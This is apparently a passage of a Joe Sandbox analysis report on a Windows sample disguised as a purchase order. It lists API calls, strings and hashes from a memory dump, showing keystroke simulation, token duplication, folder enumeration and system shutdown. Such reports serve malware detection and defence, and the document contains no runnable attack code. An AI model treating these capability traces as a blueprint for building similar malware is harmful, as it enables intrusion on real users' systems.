                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                    • ImageList_SetDragCursorImage.COMCTL32(00AC6160,00000000,00000000,00000000), ref: 0047CB9B
                                                    • ImageList_BeginDrag.COMCTL32(00AC6160,00000000,000000F8,000000F0), ref: 0047CBAC
                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                    • SendMessageW.USER32 ref: 0047CD12
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                    • SendMessageW.USER32 ref: 0047CD80
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                    • SendMessageW.USER32 ref: 0047CE93
                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,00971A68,00000000,?,?,?,?), ref: 0047CF1C
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,00971A68,00000000,?,?,?,?), ref: 0047CFE6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3100379633-4164748364
                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                    • IsIconic.USER32(?), ref: 0043444F
                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 2889586943-2988720461
                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                    APIs
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                    • _wcslen.LIBCMT ref: 00446498
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                    • String ID: $@OH$default$winsta0
                                                    • API String ID: 3324942560-3791954436
                                                    • Opcode ID: 1bb884a3aaab9660f7068a192c57b32812f4acab3a56684ae30372c532b9dbe9
                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                    • Opcode Fuzzy Hash: 1bb884a3aaab9660f7068a192c57b32812f4acab3a56684ae30372c532b9dbe9
                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                    • __swprintf.LIBCMT ref: 004789D3
                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                    • __swprintf.LIBCMT ref: 00478A79
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                    • __swprintf.LIBCMT ref: 00478B03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 999945258-2428617273
                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                    • _wcscat.LIBCMT ref: 004034BC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                    • _wcslen.LIBCMT ref: 00403623
                                                    • _wcslen.LIBCMT ref: 0040367D
                                                    Strings
                                                    • _, xrefs: 0040371C
                                                    • Error opening the file, xrefs: 00428231
                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                    • Unterminated string, xrefs: 00428348
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                    • API String ID: 3393021363-188983378
                                                    • Opcode ID: bb30b1b93ca4d6bb3796685948854f3a267586b28c30885608668d78be700e93
                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                    • Opcode Fuzzy Hash: bb30b1b93ca4d6bb3796685948854f3a267586b28c30885608668d78be700e93
                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1409584000-438819550
                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2192556992-3457252023
                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                    • __swprintf.LIBCMT ref: 004722B9
                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FolderPath$LocalTime__swprintf
                                                    • String ID: %.3d
                                                    • API String ID: 3337348382-986655627
                                                    • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                    • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                    • GetLastError.KERNEL32 ref: 00433414
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 2938487562-3733053543
                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                    APIs
                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
